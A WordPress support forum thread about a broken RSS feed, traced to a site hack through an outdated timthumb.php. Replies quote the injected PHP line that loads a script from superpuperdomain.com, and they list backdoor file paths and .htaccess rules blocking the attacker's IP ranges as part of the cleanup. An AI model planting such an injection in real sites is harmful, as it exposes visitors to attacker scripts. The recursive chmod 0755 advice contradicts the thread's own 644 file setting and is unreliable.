• Resolved quickfixsports

    (@quickfixsports)


    My RSS feed was fine up until today. For some reason it is not working. The only thing i can think of is i removed the feed from HootSuite because it was posting the feed to my Twitter and FB.

    If i plug in https://www.quickfixsports.com/wp-feed.php i see my feed, but not my last post. It also gives me this error message “This feed contains errors. Internet Explorer will try updating this feed again later”

    My FeedBurner is alo not working properly (https://feeds.feedburner.com/QuickFixSports)

    When i try a feed validator i get this message:

    “Sorry this feed does not validate.

    line 599, column 0: XML parsing error: <unknown>:599:0: junk after document element [help]

    <script language=”javascript” SRC=”https://superpuperdomain.com/count.php?ref

    In addition, interoperability with the widest range of feed readers could be improved by implementing the following recommendation.

    line 159, column 0: content:encoded should not contain object tag [help]

    <p><object width=”500″ height=”400″><param name=”movie” value=”https://www.yo

    Source: https://www.quickfixsports.com/feed/

    Please help me fix my feed please…uhg.

    https://www.quickfixsports.com

Viewing 15 replies - 1 through 15 (of 19 total)
  • Just saw this on both of my sites. How do I delete this line of code?

    Got it! That line of code can be found in the root file of your domain host. Edit the index.php file and you should see it in the last line of code. Delete the line then save it and your RSS should be back up. Worked on both of my sites. Good luck!

    Same thing happened to mine! Your post helped me out. Thanks!

    https://www.girlgonegeekblog.com
    feed://feeds.feedburner.com/girlgonegeekblog

    Hello,

    I have/had a similar problem, not with my rss though.

    You should read the following about superpuperdomain.com

    What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.

    Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

    I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.
    I scoured the Internet and finally found a fix.

    First, in your WordPress’s index.php, remove the following script added by the hack:

    echo ‘<script type=”text/javascript” language=”javascript” src=”https://superpuperdomain.com/count.php?ref=&#8217;.urlencode($_SERVER[‘HTTP_REFERER’]) .'”></script>’;

    Then remove two phony files added by the hackers (back up first, in case your installation actually requires these files):

    /wp-admin/js/config.php
    /wp-admin/common.php

    Do not try to open any of these files, as my antivirus sounded alarms immediately.

    I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

    To increase your site’s security, make sure you have correct permissions for files and directories.

    Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

    Run this bash command to set the correct permissions recursively for your WordPress installation:

    chmod -R 0755 /wordpressdirectory

    I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

    order allow,deny
    deny from 91.220
    allow from all

    The malicious script was run from superpuperdomain.com and I had run a traceroute on that domain, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220) and they would receive a forbidden notice if they tried to access TechSpheria again.

    Source: Techspheria

    https://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/

    Maybe it is a smart idea to check your WordPress installation for the files, ban the IP and update your timthumb.php…. Just in case ??

    Thread Starter quickfixsports

    (@quickfixsports)

    Wow! Very useful stuff…i did exactly what you said and it worked. Thank you. I even deleated the hackers files.

    My question now is how do i prevent this from happening again?

    There is another file in wp-content called udp.php.

    I think just ban the IP range and do a backtrack on the website to get the direct IP adress, and ban it as well. Just in case.

    If you updated your timtumb.php, they can’t place anything else on your website.

    IGIT Related Posts With Thumb Image After Posts is the plugin which is causing this. I have seen the same as @oceansdb earlier. More details here

    If you have fallen to this timthumb.php hack you need to make sure you have a good look through all your files for any files that have been modified in the last couple of weeks.

    udp.php will more than likely be present in a number of locations. The hacker will have placed a number backdoors not just udp.php.

    Check all recently modified files! otherwise they will just get back in.

    This thread was a huge help! Thank you! I’d like to know what plugin the hacker came in on. This recently happened to me.

    Thank you @oceansdb — your guide was a HUGE help! I got bit by this one too. By chance, can anyone recommend a related posts thumb plugin by a more reliable developer? I liked the function of the plugin… just don’t want the hack ??

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    ?????? Advisor and Activist

    @everybody please don’t forget to delete the phony files as well.

    There are 6 now:

    /wp-admin/js/config.php
    /wp-admin/common.php
    /wp-admin/udp.php
    /wp-content/udp.php
    /wp-content/uploads/feed-file.php
    /wp-content/uploads/feed-files.php

    A new domain popped up, so you have to change your .htaccess (not inside public_html) and replace the lines with this:

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from superpuperdomain.com
    deny from superpuperdomain2.com
    allow from all
    ed

    (@wesleysoccer)

    I updated my timthumb.php and deleted the above @oceansdb suggestions files…what else should I do?

    Make yourselve a nice .htaccess file. Do you have a ban plugin for wordpress? If yes, ban the ip + ip range.

Viewing 15 replies - 1 through 15 (of 19 total)
  • The topic ‘RSS Feed Crash’ is closed to new replies.